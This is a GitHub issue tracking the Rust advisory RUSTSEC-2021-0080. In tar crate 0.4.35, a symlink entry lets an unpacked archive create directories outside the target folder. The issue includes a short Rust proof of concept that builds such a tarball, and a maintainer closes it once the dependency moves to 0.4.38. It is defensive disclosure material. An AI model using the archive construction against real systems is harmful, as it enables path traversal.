Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RUSTSEC-2021-0080: Links in archive can create arbitrary directories #208

Closed
github-actions bot opened this issue Aug 9, 2021 · 2 comments
Closed
Assignees

Comments

@github-actions
Copy link

github-actions bot commented Aug 9, 2021

Links in archive can create arbitrary directories

Details
Package tar
Version 0.4.35
URL alexcrichton/tar-rs#238
Date 2021-07-19

When unpacking a tarball that contains a symlink the tar crate may create
directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are
already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This issue was discovered and reported by Martin Michaelis (@mgjm).

See advisory page for additional details.

@pinkforest
Copy link
Collaborator

pinkforest commented Dec 16, 2021

I've bumped the tar in cargo upstream that ensures minimum tar is 0.4.36 that has addressed this properly.

When ever there is new crate release we can bump our dep to properly enforce minimum -

Even by using the current cargo version 0.52.0 the tar that gets dep'ed in .lock is 0.4.38.

I'm working on patch that solves another advisory as part of the cargo bump which has some interface changes.

@tarcieri can you assign this to me pls.

@pinkforest
Copy link
Collaborator

I'll close this since Cargo.lock now meets tar 0.4.38

[[package]]
name = "tar"
version = "0.4.38"
source = "registry+https://github.com/rust-lang/crates.io-index"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant